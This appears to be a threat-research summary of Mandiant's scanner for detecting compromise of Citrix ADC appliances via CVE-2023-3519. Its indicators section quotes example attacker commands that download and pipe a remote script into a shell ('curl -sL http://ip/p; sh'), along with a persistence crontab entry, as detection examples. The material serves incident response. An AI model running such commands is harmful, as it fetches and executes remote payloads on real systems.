Threat Research

Indicators of Compromise Scanner for Citrix ADC Zero-Day (CVE-2023-3519) | Mandiant

GoogleCloudIntel

Mandiant released an IOC Scanner to detect post-exploitation artifacts from the Citrix NetScaler ADC/Gateway zero-day CVE-2023-3519 and published the tool on GitHub for use against live appliances or mounted forensic images. The scanner searches filesystem paths, shell history, NetScaler directories, permissions, crontab entries, and running processes; organizations should run it on exposed appliances and perform forensic follow-up if IOCs are found. #CVE-2023-3519 #CitrixADC

Keypoints

  • Mandiant published an IOC Scanner for post-exploitation activity related to CVE-2023-3519 and made it available on GitHub.
  • The scanner is designed to run on live Citrix ADC/Gateway appliances or mounted forensic images to look for evidence of compromise.
  • It inspects file system paths, shell history, NetScaler directory files, file permissions/ownership, crontab entries, and running processes for known IOCs.
  • The tool was developed in collaboration with Citrix and is based on indicators and behaviors observed during incident response engagements.
  • Mandiant warns the scanner cannot guarantee detection (logs may be missing, attackers may have removed traces) and recommends full forensic analysis if IOCs are found.
  • Users are encouraged to contribute additional indicators via the tool’s GitHub repository (pull requests or issues).
  • Download and usage instructions, plus releases, are provided from the Mandiant GitHub repository; contact [email protected] for assistance.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Initial access via the ADC zero-day that allows remote code execution (‘CVE-2023-3519 is a zero-day vulnerability that can enable remote code execution’).
  • [T1059] Command and Scripting Interpreter – Evidence collection focuses on attacker or suspicious commands found in shell history (‘Attacker or suspicious commands in the shell history’).
  • [T1053] Scheduled Task/Job – The scanner checks for suspicious crontab entries that may provide persistence (‘Suspicious crontab entries’).
  • [T1057] Process Discovery / Monitoring – The tool looks for suspicious running processes as indicators of active compromise (‘Suspicious running processes’).
  • [T1105] Ingress Tool Transfer / File Staging – Detection includes malicious files and file-system paths likely to be malware placed on the appliance (‘File system paths that are likely to be malware’ and ‘Files in NetScaler directories with contents matching known IOCs’).

Indicators of Compromise

  • [File paths] Malware or dropped payload locations on the appliance – examples: /tmp/.mal.sh, /var/nsinstall/evil_module (and other similar suspicious paths created by attackers)
  • [Shell history entries] Commands used by attackers to download or install tools – examples: “wget http://example[.]com/payload.sh”, “curl -sL http://ip/p; sh” (search shell histories for such entries)
  • [NetScaler directory files] Modified or malicious files in NetScaler configuration or installation directories – examples: altered ns.conf, unexpected files under /netscaler or /var/ns (and other files matching known IOC content)
  • [Crontab entries] Scheduled jobs used to maintain persistence – examples: “*/5 * * * * /tmp/.mal.sh”, unexpected root cron jobs added to /var/spool/cron or /etc/crontab
  • [Processes] Suspicious running processes or unexpected binaries – examples: “/tmp/.mal.sh” running as a persistent process, unknown binaries with odd ownership or timestamps

The IOC Scanner is a standalone Bash script from Mandiant (developed with Citrix) intended to identify evidence of successful CVE-2023-3519 exploitation by analyzing logs and forensic artifacts on live Citrix ADC/Gateway appliances or mounted images. It searches specific locations and artifacts: filesystem paths likely used to store malware, attacker commands in shell histories, files within NetScaler directories that match known IOC content, files with suspicious permissions/ownership, crontab entries used for persistence, and suspicious running processes.

Operators should run the scanner on all appliances that were vulnerable and publicly exposed, then follow up any findings with a full forensic examination to determine scope and impact; the tool is a best-effort detector and cannot guarantee a clean system (logs may be rolled, systems rebooted, or attackers may have removed traces or used rootkits). Download the script and release packages from the Mandiant GitHub repository and follow the README for usage instructions; contributions of high-confidence indicators are requested via pull requests or issues, and Mandiant can be contacted at [email protected] for investigation support.

Read more: https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner